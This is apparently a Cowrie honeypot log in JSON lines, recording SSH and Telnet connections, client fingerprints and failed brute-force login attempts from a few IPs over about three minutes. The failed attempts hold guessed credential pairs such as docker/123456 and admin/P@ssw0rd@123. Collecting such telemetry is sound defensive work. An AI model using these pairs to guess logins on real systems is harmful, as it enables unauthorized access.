{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:11:38.829652Z","src_ip":"212.227.125.160","session":"6298b253ad8d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:11:38.994470Z","src_ip":"212.227.125.160","session":"6298b253ad8d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456","message":"login attempt [docker/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:39.491286Z","src_ip":"212.227.125.160","session":"6298b253ad8d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:40.797286Z","src_ip":"212.227.125.160","session":"6298b253ad8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50788,"dst_ip":"1.2.3.4","dst_port":22,"session":"5569dc46b8a8","protocol":"ssh","message":"New connection: 212.227.125.160:50788 (1.2.3.4:22) [session: 5569dc46b8a8]","sensor":"my-vps","timestamp":"2025-08-28T13:12:15.876960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:12:15.894253Z","src_ip":"212.227.125.160","session":"5569dc46b8a8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:12:16.057559Z","src_ip":"212.227.125.160","session":"5569dc46b8a8"}
{"eventid":"cowrie.login.failed","username":"docker","password":"password","message":"login attempt [docker/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:12:16.695337Z","src_ip":"212.227.125.160","session":"5569dc46b8a8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:12:17.860908Z","src_ip":"212.227.125.160","session":"5569dc46b8a8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55506,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c82d9025294","protocol":"ssh","message":"New connection: 217.72.205.35:55506 (1.2.3.4:22) [session: 1c82d9025294]","sensor":"my-vps","timestamp":"2025-08-28T13:12:25.911778Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:12:25.912992Z","src_ip":"217.72.205.35","session":"1c82d9025294"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48978,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8fb6ffaa7a","protocol":"ssh","message":"New connection: 212.227.235.229:48978 (1.2.3.4:22) [session: 0b8fb6ffaa7a]","sensor":"my-vps","timestamp":"2025-08-28T13:12:41.904665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:12:41.905586Z","src_ip":"212.227.235.229","session":"0b8fb6ffaa7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:12:42.114297Z","src_ip":"212.227.235.229","session":"0b8fb6ffaa7a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"Oracle2025","message":"login attempt [oracle/Oracle2025] failed","sensor":"my-vps","timestamp":"2025-08-28T13:12:42.989726Z","src_ip":"212.227.235.229","session":"0b8fb6ffaa7a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:12:44.200175Z","src_ip":"212.227.235.229","session":"0b8fb6ffaa7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55586,"dst_ip":"1.2.3.4","dst_port":22,"session":"17ade623c5cb","protocol":"ssh","message":"New connection: 212.227.125.160:55586 (1.2.3.4:22) [session: 17ade623c5cb]","sensor":"my-vps","timestamp":"2025-08-28T13:12:52.234878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:12:52.244757Z","src_ip":"212.227.125.160","session":"17ade623c5cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:12:52.402650Z","src_ip":"212.227.125.160","session":"17ade623c5cb"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456789","message":"login attempt [docker/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:12:53.073833Z","src_ip":"212.227.125.160","session":"17ade623c5cb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:12:54.245387Z","src_ip":"212.227.125.160","session":"17ade623c5cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49113,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b8aee14b065","protocol":"ssh","message":"New connection: 212.227.235.229:49113 (1.2.3.4:22) [session: 9b8aee14b065]","sensor":"my-vps","timestamp":"2025-08-28T13:12:59.750126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:12:59.751375Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:12:59.876206Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123@#","message":"login attempt [admin/admin123@#] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:00.422501Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62387,"dst_ip":"1.2.3.4","dst_port":22,"session":"d99e29c95f99","protocol":"ssh","message":"New connection: 212.227.235.229:62387 (1.2.3.4:22) [session: d99e29c95f99]","sensor":"my-vps","timestamp":"2025-08-28T13:13:00.547572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:13:00.552244Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:13:00.707489Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789a","message":"login attempt [admin/123456789a] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:01.576458Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren","message":"login attempt [warren/warren] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:01.879548Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.login.failed","username":"admin","password":"888888","message":"login attempt [admin/888888] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:02.704065Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren1","message":"login attempt [warren/warren1] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:03.038952Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd@123","message":"login attempt [admin/P@ssw0rd@123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:03.831763Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren123","message":"login attempt [warren/warren123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:04.197758Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Huawei12#$","message":"login attempt [admin/Huawei12#$] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:04.959773Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren1234","message":"login attempt [warren/warren1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:05.355773Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:13:06.105476Z","src_ip":"212.227.235.229","session":"9b8aee14b065"}
{"eventid":"cowrie.login.failed","username":"warren","password":"warren12345","message":"login attempt [warren/warren12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:06.500901Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:13:07.635642Z","src_ip":"212.227.235.229","session":"d99e29c95f99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56892,"dst_ip":"1.2.3.4","dst_port":23,"session":"516030ba3058","protocol":"telnet","message":"New connection: 212.227.125.160:56892 (1.2.3.4:23) [session: 516030ba3058]","sensor":"my-vps","timestamp":"2025-08-28T13:13:13.116469Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59076,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3d181bb9353","protocol":"ssh","message":"New connection: 212.227.125.160:59076 (1.2.3.4:22) [session: b3d181bb9353]","sensor":"my-vps","timestamp":"2025-08-28T13:13:28.126955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:13:28.313112Z","src_ip":"212.227.125.160","session":"b3d181bb9353"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:13:28.313827Z","src_ip":"212.227.125.160","session":"b3d181bb9353"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345","message":"login attempt [docker/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:13:29.022581Z","src_ip":"212.227.125.160","session":"b3d181bb9353"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:13:30.200615Z","src_ip":"212.227.125.160","session":"b3d181bb9353"}
{"eventid":"cowrie.session.closed","duration":39.52693510055542,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:13:52.643332Z","src_ip":"212.227.125.160","session":"516030ba3058"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40294,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e4c82eaf782","protocol":"ssh","message":"New connection: 212.227.125.160:40294 (1.2.3.4:22) [session: 2e4c82eaf782]","sensor":"my-vps","timestamp":"2025-08-28T13:14:03.897251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:14:03.898304Z","src_ip":"212.227.125.160","session":"2e4c82eaf782"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:14:04.072555Z","src_ip":"212.227.125.160","session":"2e4c82eaf782"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345678","message":"login attempt [docker/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:14:04.597789Z","src_ip":"212.227.125.160","session":"2e4c82eaf782"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:14:05.776189Z","src_ip":"212.227.125.160","session":"2e4c82eaf782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49276,"dst_ip":"1.2.3.4","dst_port":23,"session":"475b4ff03fed","protocol":"telnet","message":"New connection: 212.227.235.229:49276 (1.2.3.4:23) [session: 475b4ff03fed]","sensor":"my-vps","timestamp":"2025-08-28T13:14:36.940915Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52918,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4f6d37f32d","protocol":"ssh","message":"New connection: 212.227.125.160:52918 (1.2.3.4:22) [session: fa4f6d37f32d]","sensor":"my-vps","timestamp":"2025-08-28T13:14:39.278089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:14:39.279808Z","src_ip":"212.227.125.160","session":"fa4f6d37f32d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:14:39.453521Z","src_ip":"212.227.125.160","session":"fa4f6d37f32d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"qwerty","message":"login attempt [docker/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:14:39.979493Z","src_ip":"212.227.125.160","session":"fa4f6d37f32d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:14:41.228490Z","src_ip":"212.227.125.160","session":"fa4f6d37f32d"}
{"eventid":"cowrie.session.closed","duration":14.538133144378662,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:14:51.478952Z","src_ip":"212.227.235.229","session":"475b4ff03fed"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":2428,"dst_ip":"1.2.3.4","dst_port":22,"session":"63d348ff2b96","protocol":"ssh","message":"New connection: 186.225.142.90:2428 (1.2.3.4:22) [session: 63d348ff2b96]","sensor":"my-vps","timestamp":"2025-08-28T13:14:53.510280Z"}
